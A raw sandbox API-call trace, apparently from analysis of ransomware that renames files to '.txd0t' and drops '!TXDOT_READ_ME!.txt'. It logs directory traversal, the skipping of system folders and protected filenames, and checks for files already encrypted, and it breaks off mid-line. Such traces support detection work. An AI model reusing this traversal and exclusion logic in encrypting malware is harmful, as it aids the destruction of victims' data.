(lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="crypt_detect") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="cryptolocker") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="ransomware") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\WINDOWS") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\Program Files") returned 0x0 [0129.207] GetProcessHeap () returned 0xe30000 [0129.207] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ce) returned 0xed90d0 [0129.207] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0129.207] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\*", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*" [0129.207] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.208] StrCmpW (psz1=".", psz2=".") returned 0 [0129.208] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.208] StrCmpW (psz1="..", psz2=".") returned 1 [0129.208] StrCmpW (psz1="..", psz2="..") returned 0 [0129.208] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x518e615d, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x518e615d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5190c39f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.208] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.208] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.208] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0129.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0129.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt" [0129.208] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.208] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.209] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.209] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f62f110, ftCreationTime.dwHighDateTime=0x1d5e689, ftLastAccessTime.dwLowDateTime=0xee412150, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x518e615d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x163c1, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="2o _xfnucm3wfE92We.ods.txd0t", cAlternateFileName="2O_XFN~1.TXD")) returned 1 [0129.209] StrCmpW (psz1="2o _xfnucm3wfE92We.ods.txd0t", psz2=".") returned 1 [0129.209] StrCmpW (psz1="2o _xfnucm3wfE92We.ods.txd0t", psz2="..") returned 1 [0129.209] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0129.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0129.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="2o _xfnucm3wfE92We.ods.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t" [0129.209] PathFindExtensionW (pszPath="2o _xfnucm3wfE92We.ods.txd0t") returned=".txd0t" [0129.209] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.209] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48075b0, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xa970ba70, ftLastAccessTime.dwHighDateTime=0x1d5e19d, ftLastWriteTime.dwLowDateTime=0x5190c39f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17872, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="cpdJYzaQxXso.odt.txd0t", cAlternateFileName="CPDJYZ~1.TXD")) returned 1 [0129.209] StrCmpW (psz1="cpdJYzaQxXso.odt.txd0t", psz2=".") returned 1 [0129.209] StrCmpW (psz1="cpdJYzaQxXso.odt.txd0t", psz2="..") returned 1 [0129.209] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0129.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0129.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="cpdJYzaQxXso.odt.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t" [0129.209] PathFindExtensionW (pszPath="cpdJYzaQxXso.odt.txd0t") returned=".txd0t" [0129.209] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.209] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e69320, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0xa1e87b90, ftLastAccessTime.dwHighDateTime=0x1d5ec0f, ftLastWriteTime.dwLowDateTime=0x5193586a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xc1fa, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="ivPZqJfxmHT.pps.txd0t", cAlternateFileName="IVPZQJ~1.TXD")) returned 1 [0129.209] StrCmpW (psz1="ivPZqJfxmHT.pps.txd0t", psz2=".") returned 1 [0129.209] StrCmpW (psz1="ivPZqJfxmHT.pps.txd0t", psz2="..") returned 1 [0129.209] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0129.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0129.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="ivPZqJfxmHT.pps.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t" [0129.209] PathFindExtensionW (pszPath="ivPZqJfxmHT.pps.txd0t") returned=".txd0t" [0129.209] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.210] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0x521649ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="jDtkUz0kU8", cAlternateFileName="JDTKUZ~1")) returned 1 [0129.210] StrCmpW (psz1="jDtkUz0kU8", psz2=".") returned 1 [0129.210] StrCmpW (psz1="jDtkUz0kU8", psz2="..") returned 1 [0129.210] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0129.210] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0129.210] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="jDtkUz0kU8", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\system32\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\system\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\local\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\boot\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\perflogs\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\programdata\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\drivers\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\wsus\\") returned 0x0 [0129.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.544] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.544] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="crypt_detect") returned 0x0 [0129.544] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="cryptolocker") returned 0x0 [0129.544] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="ransomware") returned 0x0 [0129.544] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\WINDOWS") returned 0x0 [0129.544] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.544] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\Program Files") returned 0x0 [0129.544] GetProcessHeap () returned 0xe30000 [0129.544] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e4) returned 0xef3600 [0129.544] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0129.544] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\*", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*" [0129.544] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*", lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0x521649ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1930 [0129.545] StrCmpW (psz1=".", psz2=".") returned 0 [0129.545] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0x521649ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.545] StrCmpW (psz1="..", psz2=".") returned 1 [0129.545] StrCmpW (psz1="..", psz2="..") returned 0 [0129.545] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519589ba, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x519589ba, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519589ba, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.545] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.545] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.545] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0129.545] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0129.545] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt" [0129.545] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.546] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.546] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd4b9150, ftCreationTime.dwHighDateTime=0x1d5e525, ftLastAccessTime.dwLowDateTime=0xea2cfea0, ftLastAccessTime.dwHighDateTime=0x1d5eb86, ftLastWriteTime.dwLowDateTime=0x519589ba, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18385, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="8GgGCWAXxjKLpeoA40OY.odp.txd0t", cAlternateFileName="8GGGCW~1.TXD")) returned 1 [0129.546] StrCmpW (psz1="8GgGCWAXxjKLpeoA40OY.odp.txd0t", psz2=".") returned 1 [0129.546] StrCmpW (psz1="8GgGCWAXxjKLpeoA40OY.odp.txd0t", psz2="..") returned 1 [0129.546] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0129.546] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0129.546] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="8GgGCWAXxjKLpeoA40OY.odp.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t" [0129.546] PathFindExtensionW (pszPath="8GgGCWAXxjKLpeoA40OY.odp.txd0t") returned=".txd0t" [0129.546] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.546] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbf0b10, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0xe1aa4ee0, ftLastAccessTime.dwHighDateTime=0x1d5e1db, ftLastWriteTime.dwLowDateTime=0x51f4e844, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x80cf, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="hnSSITWu7H4.odt.txd0t", cAlternateFileName="HNSSIT~1.TXD")) returned 1 [0129.546] StrCmpW (psz1="hnSSITWu7H4.odt.txd0t", psz2=".") returned 1 [0129.546] StrCmpW (psz1="hnSSITWu7H4.odt.txd0t", psz2="..") returned 1 [0129.546] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0129.546] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0129.546] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="hnSSITWu7H4.odt.txd0t", cchMax=1124 | out: 